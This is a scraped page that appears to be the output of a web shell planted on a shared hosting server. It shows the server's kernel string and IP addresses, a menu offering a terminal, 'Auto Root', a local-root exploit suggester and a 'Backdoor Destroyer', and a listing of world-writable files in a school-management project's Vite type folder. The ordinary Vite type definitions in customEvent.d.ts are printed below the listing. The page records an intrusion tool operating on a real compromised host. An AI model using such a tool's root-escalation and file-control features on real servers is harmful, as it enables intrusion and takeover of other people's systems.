Linux sg77.dns-private.com 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64
LiteSpeed
Server IP : 135.181.230.13 & Your IP : 216.73.217.69
Domains :
Cant Read [ /etc/named.conf ]
User : pilasate
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
pilasate /
schoolms /
node_modules /
vite /
types /
Delete
Unzip
Name
Size
Permission
Date
Action
internal
[ DIR ]
drwxrwxrwx
2025-03-24 11:44
customEvent.d.ts
1.12
KB
-rw-rw-rw-
2025-03-24 11:44
hmrPayload.d.ts
1.2
KB
-rw-rw-rw-
2025-03-24 11:44
hot.d.ts
1003
B
-rw-rw-rw-
2025-03-24 11:44
import-meta.d.ts
249
B
-rw-rw-rw-
2025-03-24 11:44
importGlob.d.ts
1.86
KB
-rw-rw-rw-
2025-03-24 11:44
importMeta.d.ts
510
B
-rw-rw-rw-
2025-03-24 11:44
metadata.d.ts
193
B
-rw-rw-rw-
2025-03-24 11:44
package.json
109
B
-rw-rw-rw-
2025-03-24 11:44
Save
Rename
import type { ErrorPayload, FullReloadPayload, PrunePayload, UpdatePayload, } from './hmrPayload' export interface CustomEventMap { 'vite:beforeUpdate': UpdatePayload 'vite:afterUpdate': UpdatePayload 'vite:beforePrune': PrunePayload 'vite:beforeFullReload': FullReloadPayload 'vite:error': ErrorPayload 'vite:invalidate': InvalidatePayload 'vite:ws:connect': WebSocketConnectionPayload 'vite:ws:disconnect': WebSocketConnectionPayload } export interface WebSocketConnectionPayload { /** * @experimental * We expose this instance experimentally to see potential usage. * This might be removed in the future if we didn't find reasonable use cases. * If you find this useful, please open an issue with details so we can discuss and make it stable API. */ // eslint-disable-next-line n/no-unsupported-features/node-builtins webSocket: WebSocket } export interface InvalidatePayload { path: string message: string | undefined } /** * provides types for built-in Vite events */ export type InferCustomEventPayload<T extends string> = T extends keyof CustomEventMap ? CustomEventMap[T] : any